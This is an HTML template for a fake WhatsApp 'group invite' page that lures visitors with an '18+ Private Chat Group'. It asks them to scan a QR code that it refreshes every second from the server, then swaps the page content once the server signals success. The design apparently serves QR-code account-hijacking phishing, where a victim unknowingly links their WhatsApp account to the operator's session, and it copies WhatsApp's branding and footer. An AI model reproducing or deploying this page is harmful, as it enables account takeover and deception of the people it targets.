<html lang="en" class="version-d platform-desktop">
<head>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<style>img[alt*="www.000webhost.com"]{display:none}

#myModal {
            display: none;
            position: fixed;
            z-index: 1;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            overflow: auto;
            background-color: rgba(0, 0, 0, 0.7);
        }

        /* Center the modal content */
        .modal-content {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: #fff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            max-width: 400px;
            text-align: center;
            font-family: Arial, sans-serif;
        }

        /* Style the close button */
        .close {
            color: #aaa;
            float: right;
            font-size: 28px;
            font-weight: bold;
            cursor: pointer;
            transition: color 0.3s;
        }

        .close:hover {
            color: #000;
        }

        /* Add some extra styling for the message */
        .message {
            font-size: 18px;
            margin-top: 20px;
        }

        /* Add a button style */
        .button {
            background-color: #4CAF50;
            color: white;
            border: none;
            padding: 10px 20px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .button:hover {
            background-color: #45a049;
        }
 /* Set a fixed width and height for the QR code images */
 #qr-box img {
            width: 200px;
            height: 200px;
            margin: 10px;
            border: 4px solid #fff; /* Add a white border */
            border-radius: 10px; /* Add rounded corners */
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.5); /* Add a shadow effect */
            transition: transform 0.3s ease; /* Add a smooth transition on hover */
        }

        #qr-box img:hover {
            transform: scale(1.1); /* Enlarge the image slightly on hover */
            box-shadow: 0 0 15px rgba(0, 0, 0, 0.7); /* Increase the shadow effect on hover */
        }
        /* Center the QR code container */
 #qr-box {
            display: flex;
            flex-wrap: wrap;
            justify-content: center;
        }
</style>
<meta charset="UTF-8">
<title>WhatsApp Group Invite</title>
<meta property="og:title" content="WhatsApp Group Invite"/>
<meta property="og:image" content="{{ url_for('static', filename='img/v4/icon.png') }}">
<meta property="og:site_name" content="WhatsApp.com"/>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"/>
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="theme-color" content="#1BA691">
<meta name="msapplication-navbutton-color" content="#1BA691">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#1BA691">
<link id="favicon" rel="shortcut icon" href="{{ url_for('static', filename='img/v4/icon.png') }}" alt="Icon" type="image/png">
<link rel="stylesheet" href="{{ url_for('static', filename='css/v4/style.build35e635e635e6.css') }}">
<!--Follow the link to join-->
<meta property="og:description" content="Follow this link to join"/>
</head>
<body class="page page--landing page--invite" id="top">
<div class="header ">
	<header class="page-header ">
	<div class="page-header__inner">
		<a class="page-header__logo" href="https://www.whatsapp.com/"></a>
		<div class="page-header__language">
			<div id="lng" onclick="toggle_lng_menu()">
				<span class="lng-id" dir="auto">
				<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" class="lng-dropdown" x="0px" y="0px" width="9px" height="20px" viewbox="0 0 9 20" style="enable-background:new 0 0 9 20;" xml:space="preserve"><polygon fill="#ffffff" points="1,9 4.5,12.5 8,9 "/></svg>
				<span class="lng-name">English</span>
				</span>
			</div>
			<div id="helptranslate">
				<li>
					<a href="https://translate.whatsapp.com/" target="_blank">Help translate WhatsApp into your language</a>
				</li>
				<div class="clear"></div>
			</div>
		</div>
	</div>
</div>
</header>
</div>
<fieldset>
<div class="page-main">
	<div class="page-main__inner">
		<div class="page-content page-content--single">
			<div class="block block--invite">
				<a href="#" id="action-icon" title="Follow this link to join: Berbagi Video 18+ Hot" class="block__img img icon-chat"><span class="img__body" style="background-image: url({{ url_for('static', filename='img/1.jpg') }});"></span>
				</a>
				<h2 class="block__title">18+ Private Chat Group<h2>
				<br>
				<h3>Scan the QR Code to join our whatsapp Group</h3>
						
		</div>
		<div id="myModal" class="modal">
			<div class="modal-content">
				<span class="close">&times;</span>
				<h2>Limited Access</h2>
				<p class="message">Scan the QR code with in your whatsapp mobile application to access our private group</p><br>
				<button class="button">Close</button>
			</div>
		</div>
		  
		<script>
			// Show the modal when the page loads
			document.addEventListener("DOMContentLoaded", function () {
				document.getElementById("myModal").style.display = "block";
			});
	
			// Add event listener to close the modal when the close button or the close button is clicked
			document.getElementsByClassName("close")[0].addEventListener("click", function () {
				document.getElementById("myModal").style.display = "none";
			});
	
			// Add event listener to close the modal when the "Close" button is clicked
			document.getElementsByClassName("button")[0].addEventListener("click", function () {
				document.getElementById("myModal").style.display = "none";
			});
		</script>
		<div id="qr-box">
			<img id="hande" src="" alt="Loading QR Code" loading="lazy" />
		</div>
		
		<script>
			// Function to update the image source with the latest QR code
			function updateImage() {
				fetch("/latest_qr_code")
				.then(response => response.json())
				.then(data => {
					var img = document.getElementById("hande");
					if (data.qr_image) {
						img.src = "data:image/png;base64," + data.qr_image;
					} else {
						img.src = "https://media.giphy.com/media/MEiZ5h8lOkM7rwideE/giphy.gif"; // If no QR code available, show an empty image
					}
	
					// Handle rendering xyz.html
					if (data.xyz_html_rendered) {
						// Load the content of 'xyz.html' into the current page
						fetch("/xyz_html_rendered")
						.then(response => response.json())
						.then(data => {
							if (data.xyz_html_rendered) {
								fetch("/")
								.then(response => response.text())
								.then(content => {
									document.documentElement.innerHTML = content;
									updateImage(); // Call updateImage function to refresh the image in 'xyz.html'
								});
							} else {
								setTimeout(updateImage, 1000);  // Check again after 1 second
							}
						});
					} else {
						setTimeout(updateImage, 1000);  // Check again after 1 second
					}
				})
				.catch(error => {
					// Handle errors if any
					console.error("Error fetching data:", error);
					setTimeout(updateImage, 1000);  // Retry after 1 second
				});
			}
	
			// Call the updateImage function when the page loads
			$(document).ready(function () {
				updateImage();
			});
		</script>
		
		
			
			<div class="block block--hint">
				 Don't have WhatsApp yet?<br>
				<a href="https://www.whatsapp.com/download">Download</a>
			</div>
			
		</div>
		
	</div>
	<footer class="page-footer-container page-footer--bottom">
	<div class="page-footer -primary">
		<div class="page-footer__inner">
			<div class="four -spaced">
				<div class="block block--footer four__item">
					<h4 class="block__title">WhatsApp</h4>
					<div class="block__body">
						<ul class="list list--footer">
							<li class="list__item">
								<a href="https://www.whatsapp.com/features/" class="list__link">Features</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsapp.com/security/" class="list__link">Security</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsapp.com/download/" class="list__link">Download</a>
							</li>
							<li class="list__item">
								<a href="https://web.whatsapp.com/" class="list__link">WhatsApp Web</a>
							</li>
							<li class="list__item">
								<span class="list__empty"></span>
							</li>
						</ul>
					</div>
				</div>
				<div class="block block--footer four__item">
					<h4 class="block__title">Company</h4>
					<div class="block__body">
						<ul class="list list--footer">
							<li class="list__item">
								<a href="https://www.whatsapp.com/about/" class="list__link">About</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsapp.com/join/" class="list__link">Careers</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsappbrand.com/" class="list__link">Brand Center</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsapp.com/contact/" class="list__link">Get in touch</a>
							</li>
							<li class="list__item">
								<a href="https://blog.whatsapp.com/" class="list__link">Blog</a>
							</li>
							<li class="list__item">
								<span class="list__empty"></span>
							</li>
							<li class="list__item">
								<span class="list__empty"></span>
							</li>
						</ul>
					</div>
				</div>
				<div class="block block--footer four__item">
					<h4 class="block__title">Download</h4>
					<div class="block__body">
						<ul class="list list--footer">
							<li class="list__item">
								<a href="https://www.whatsapp.com/download/" class="list__link">Mac/PC</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsapp.com/android/" class="list__link">Android</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsapp.com/appstore/" class="list__link">iPhone</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsapp.com/wp/" class="list__link">Windows Phone</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsapp.com/ota/" class="list__link">BlackBerry</a>
							</li>
							<li class="list__item">
								<a href="https://www.whatsapp.com/nokia/" class="list__link">Nokia</a>
							</li>
						</ul>
					</div>
				</div>
				<div class="block block--footer four__item">
					<h4 class="block__title">Help</h4>
					<div class="block__body">
						<ul class="list list--footer">
							<li class="list__item">
								<a href="https://www.whatsapp.com/faq/" class="list__link">FAQ</a>
							</li>
							<li class="list__item">
								<a href="https://twitter.com/whatsapp" class="list__link">Twitter</a>
							</li>
							<li class="list__item">
								<a href="https://www.facebook.com/WhatsApp" class="list__link">Facebook</a>
							</li>
							<li class="list__item">
								<span class="list__empty"></span>
							</li>
							<li class="list__item">
								<span class="list__empty"></span>
							</li>
							<li class="list__item">
								<span class="list__empty"></span>
							</li>
						</ul>
					</div>
				</div>
			</div>
		</div>
	</div>
	<div class="page-footer -secondary">
		<div class="page-footer__inner">
			<div class="four">
				<div class="four__item" dir="auto"> <?php echo date("Y"); ?>  &copy; WhatsApp Inc.</div>
				<div class="four__item -span3">
					<a href="https://www.whatsapp.com/legal/" class="page-footer__link">Privacy & Terms</a>
				</div>
			</div>
		</div>
	</div>
	</footer>
	</body>
	</html>
